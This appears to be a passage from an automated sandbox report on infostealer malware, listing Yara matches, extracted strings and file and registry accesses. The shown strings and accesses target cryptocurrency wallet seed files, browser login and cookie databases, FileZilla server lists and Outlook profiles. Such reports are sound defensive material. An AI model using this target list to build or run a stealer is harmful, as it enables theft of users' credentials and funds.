Source: Yara match File source: 5.2.ZYgCMtJP3wxddinn5Sa3IKJH.exe.40e5570.0.raw.unpack, type: UNPACKEDPE
Source: RegAsm.exe String found in binary or memory: lockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exo
Source: RegAsm.exe String found in binary or memory: us|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|M
Source: RegAsm.exe String found in binary or memory: lockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exo
Source: FileApp.exe, 00000000.00000002.2130547013.0000000005D20000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: CVRMAVOZKNKKEPGOIFIDCMVPPNFPDVCIGEJAXXDEIJCFMHXO
Source: RegAsm.exe String found in binary or memory: us|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|M
Source: RegAsm.exe String found in binary or memory: lockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exo
Source: RegAsm.exe String found in binary or memory: lockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exo
Source: RegAsm.exe String found in binary or memory: us|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|M
Source: RegAsm.exe String found in binary or memory: lockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exo
Source: RegAsm.exe String found in binary or memory: passphrase.json
Source: RegAsm.exe String found in binary or memory: \jaxx\Local Storage\
Source: RegAsm.exe String found in binary or memory: \Ethereum\
Source: RegAsm.exe String found in binary or memory: lockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exo
Source: RegAsm.exe String found in binary or memory: Ethereum
Source: RegAsm.exe String found in binary or memory: file__0.localstorage
Source: RegAsm.exe String found in binary or memory: \Coinomi\Coinomi\wallets\
Source: RegAsm.exe String found in binary or memory: \Exodus\exodus.wallet\
Source: RegAsm.exe String found in binary or memory: ltiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.js
Source: RegAsm.exe String found in binary or memory: us|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|M
Source: FileApp.exe, 00000000.00000000.2112885323.0000000000692000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: set_UseMachineKeyStore
Source: RegAsm.exe String found in binary or memory: lockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exo
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite-wal
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\prefs.js
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite-shm
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite-wal
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journal
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite-shm
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\atomic\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Binance\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\Cache\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\db\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Exodus\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Guarda\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Exodus\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\MultiDoge\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Binance\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004
Source: C:\Users\user\Documents\iofolko5\g5YPTfbb3UXQYqfB9k0rJePl.exe Directory queried: C:\Users\user\Documents
Source: Yara match File source: 00000016.00000002.3044658256.000000000108A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.2991424929.0000000002818000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match File source: 12.2.m9GWTeQylsPUCcnTEkTCS8lf.exe.24ec000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 37.2.BitLockerToGo.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.uht_7KlzJBHoKg010MzYxndX.exe.1a50000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.uht_7KlzJBHoKg010MzYxndX.exe.1b50000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.2.BitLockerToGo.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.m9GWTeQylsPUCcnTEkTCS8lf.exe.24ec000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 37.2.BitLockerToGo.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.2.BitLockerToGo.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.uht_7KlzJBHoKg010MzYxndX.exe.1b50000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.m9GWTeQylsPUCcnTEkTCS8lf.exe.2380000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.m9GWTeQylsPUCcnTEkTCS8lf.exe.2380000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.uht_7KlzJBHoKg010MzYxndX.exe.1a50000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000025.00000002.2651621798.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2767261547.0000000002380000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2703817640.0000000002060000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2733299099.0000000001B50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2767261547.00000000024EC000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2733299099.0000000001A50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000002.2610045392.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2656601610.00000000018EC000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 23.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.ZYgCMtJP3wxddinn5Sa3IKJH.exe.40e5570.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.ZYgCMtJP3wxddinn5Sa3IKJH.exe.40e5570.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000017.00000002.2458059761.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2594491331.00000000040E5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: 8.2.xNc0eiwaHinah8TaPUA3TuXZ.exe.33c5570.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.xNc0eiwaHinah8TaPUA3TuXZ.exe.33c5570.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000008.00000002.2611175093.00000000033C5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.2847715040.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: xNc0eiwaHinah8TaPUA3TuXZ.exe PID: 4072, type: MEMORYSTR
Source: Yara match File source: 00000007.00000002.3125271481.000000000148E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.3044658256.000000000108A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: kPy9KuGWnhtidoY4IdmVbiaT.exe PID: 3048, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: 25.2.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 25.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.DSN_5xuwaC5nkP_MHzd7lLTl.exe.4295570.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.DSN_5xuwaC5nkP_MHzd7lLTl.exe.4295570.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000A.00000002.2613302475.0000000004295000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000002.3234197718.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: DSN_5xuwaC5nkP_MHzd7lLTl.exe PID: 7060, type: MEMORYSTR
Source: Yara match File source: 23.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.ZYgCMtJP3wxddinn5Sa3IKJH.exe.40e5570.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.ZYgCMtJP3wxddinn5Sa3IKJH.exe.40e5570.0.raw.unpack, type: UNPACKEDPE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69CC0B40 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_zeroblob, 22_2_69CC0B40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69CC0D60 sqlite3_bind_parameter_name, 22_2_69CC0D60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69CC0C40 sqlite3_bind_zeroblob, 22_2_69CC0C40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69BE8EA0 sqlite3_clear_bindings, 22_2_69BE8EA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69BE60B0 listen,WSAGetLastError, 22_2_69BE60B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69BEC030 sqlite3_bind_parameter_count, 22_2_69BEC030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69BE6070 PR_Listen, 22_2_69BE6070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69BEC050 sqlite3_bind_parameter_index,strlen,strncmp,strncmp, 22_2_69BEC050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69BE63C0 PR_Bind, 22_2_69BE63C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69B722D0 sqlite3_bind_blob, 22_2_69B722D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69BE6410 bind,WSAGetLastError, 22_2_69BE6410